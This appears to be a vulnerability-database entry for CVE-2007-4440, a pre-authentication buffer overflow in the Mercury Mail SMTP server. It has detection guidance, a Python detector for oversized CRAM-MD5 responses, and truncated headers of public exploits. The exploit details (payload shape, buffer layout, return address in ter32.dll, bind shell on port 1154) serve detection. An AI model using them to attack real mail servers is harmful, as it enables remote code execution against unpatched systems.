CVE-2007-4440
Published 2007-08-21
Priority P2 · 59 · high · CVSS 2.0 base score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit available
EPSS 64.51% (99.1 percentile)
Stack-based buffer overflow in the MercuryS SMTP server in Mercury Mail Transport System, possibly 4.51 and earlier, allows remote attackers to execute arbitrary code via a long AUTH CRAM-MD5 string. NOTE: this might overlap CVE-2006-5961.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmail | mercury_mail_transport_system | <= 4.51 | — |
Detection & IOCs (extracted from sources)
Byte pattern: `\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45\x3c`
- Detect exploitation attempts by monitoring SMTP traffic for an AUTH CRAM-MD5 command followed by an abnormally long base64-encoded string on port 25.
- The PoC sends a base64-encoded payload of 'QUFB' repeated 10000 times; alert on AUTH CRAM-MD5 responses followed by extremely long base64 strings (e.g., >1000 chars).
- The Metasploit exploit uses a buffer of 204 bytes of random uppercase alpha + return address + payload padded to 1075 bytes, all base64-encoded; flag AUTH CRAM-MD5 responses with base64 payloads exceeding ~1500 bytes.
- Post-exploitation: monitor for an unexpected bind shell on TCP port 1154 opened by the Mercury Mail server process.
- The exploit targets the return address 0x258d0d1e in ter32.dll; use memory integrity or module load monitoring to detect ROP/ret2lib abuse of this address in Mercury Mail.
- The exploit payload bad characters are null byte, LF, CR, space, and percent sign; payloads containing these in the AUTH CRAM-MD5 argument are likely not this exploit variant.
- The vulnerability is pre-authentication; no valid credentials are required to trigger the overflow, so network-level SMTP access alone is sufficient for exploitation.
- The Metasploit module targets only Mercury Mail Transport System 4.51 with the specific return address in ter32.dll; other versions may require different offsets.
- The CVE notes possible overlap with CVE-2006-5961, so detections may fire on both vulnerabilities if they target the same AUTH CRAM-MD5 overflow vector.
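Added here to illustrate the detection guidance above (this is not code from any of the page's sources): a Python checker that walks an SMTP session transcript and flags AUTH CRAM-MD5 exchanges whose response is oversized, not valid base64, or not shaped like a real CRAM-MD5 digest. The sample sessions, the user name and the 1000-character threshold are constructed from the bullets above, not taken from a capture.

```python
import base64
import re

# A legitimate CRAM-MD5 response decodes to "<username> <32 hex digits>" (RFC 2195), so it is
# short and has a fixed shape; the PoCs described above send kilobytes of base64 instead.
VALID_RESPONSE = re.compile(rb"^[^ ]{1,255} [0-9a-f]{32}$")
MAX_B64_LEN = 1000  # length threshold taken from the detection guidance above

def classify_response(blob):
    """Return None for a plausible CRAM-MD5 response, otherwise a short reason string."""
    if len(blob) > MAX_B64_LEN:
        return "oversized"
    try:
        decoded = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "not_base64"
    return None if VALID_RESPONSE.match(decoded) else "malformed_digest"

def analyze_session(session):
    """session: list of (who, line), who in {'C', 'S'}, one SMTP line per entry.
    Returns [(line_index, where, reason)] for abnormal AUTH CRAM-MD5 exchanges."""
    alerts, state = [], "idle"  # idle -> challenge_pending (AUTH) -> response_pending (334)
    for idx, (who, line) in enumerate(session):
        line = line.strip()
        if who == "S":
            if state == "challenge_pending":
                state = "response_pending" if line.startswith("334") else "idle"
            continue
        if state == "response_pending":
            state = "idle"
            if line != "*":  # "*" cancels the exchange (RFC 4954)
                reason = classify_response(line.encode())
                if reason:
                    alerts.append((idx, "response", reason))
            continue
        parts = line.split(None, 2)
        if len(parts) >= 2 and parts[0].upper() == "AUTH" and parts[1].upper() == "CRAM-MD5":
            if len(parts) == 3:  # CRAM-MD5 is server-first, so an argument on the AUTH line is abnormal
                alerts.append((idx, "auth_argument", classify_response(parts[2].encode()) or "unexpected_argument"))
            else:
                state = "challenge_pending"
    return alerts

# Constructed sample sessions (not real captures): a normal login and the 'QUFB' * 10000 PoC shape.
CHALLENGE = "334 " + base64.b64encode(b"<1234.5678@mail.example>").decode()
LEGIT_SESSION = [("C", "AUTH CRAM-MD5"), ("S", CHALLENGE),
                 ("C", base64.b64encode(b"alice " + b"0123456789abcdef" * 2).decode()), ("S", "235 OK")]
POC_SESSION = [("C", "EHLO client.example"), ("S", "250 mail.example"),
               ("C", "AUTH CRAM-MD5"), ("S", CHALLENGE), ("C", "QUFB" * 10000)]
```

Because the check decodes the response and tests its shape, it also catches payloads that stay under the length threshold but do not decode to a user name and a 32-character hex digest.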
No detection rules found.
Exploit-DB · 2010-06-22
Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: mercury_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (the module's include lines and the opening of initialize()/update_info are missing from this excerpt)
      'Name'        => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.
          By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker
          may be able to execute arbitrary code.
      },
      'Author'      => [ 'MC' ],
      'Version'     => '$Revision: 9583 $',
      'References'  =>
        [
          [ 'CVE', '2
```
Exploit-DB · 2007-08-22
Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Remote Overflow
---
```c
/*
Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal)
Public Version 1.0
http://www.ph4nt0m.org
2007-08-22

Code by: Zhenhan.Liu
Original POC: http://www.milw0rm.com/exploits/4294
Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html
Our Mail-list: http://list.ph4nt0m.org (Chinese)

It will bind a cmdshell on port 1154 if successful.

Z:\Exp\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow
== Public Version 1.0
== http://www.ph4nt0m.org 2007-08-22
[*] connect to 127.0.0.1:25 ... OK!
[C] EHLO void#ph4nt0m.org
[S] 220 root ESMTP server ready.
[S] 250-root Hello void#ph4nt0m.org; ESMTPs are:
250-TIME
[S]
```
Exploit-DB · 2007-08-18
Mercury/32 Mail SMTPD - Remote Stack Overrun (PoC)
---
```
# Mercury Mail Transport System Remote Stack Based Overflow
#
# Overview
# Mercury Mail Transport System: Mercury is a free, standards-based mail server
# solution, providing comprehensive, fast server support for all major Internet e-
# mail protocols. It is supplied in two versions, one hosted on Windows systems,
# the other running as a set of NLMs on Novell NetWare file servers.
#
# Description
# There is a remotely exploitable stack based buffer overrun in the latest version of
# Mercury Mail Transport System. Specifically the SMTP Server does not properly
# handle long AUTH CRAM-MD5 strings resulting in a complete compromise of th
```
Metasploit
Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
---
This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51. By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
References:
- http://archives.neohapsis.com/archives/fulldisclosure/2007-08/0341.html
- http://secunia.com/advisories/26519
- http://www.pmail.com/m32_451.htm
- http://www.securityfocus.com/bid/25357
- http://www.securitytracker.com/id?1018587
- http://www.vupen.com/english/advisories/2007/2918
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36117
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36299
- https://www.exploit-db.com/exploits/4294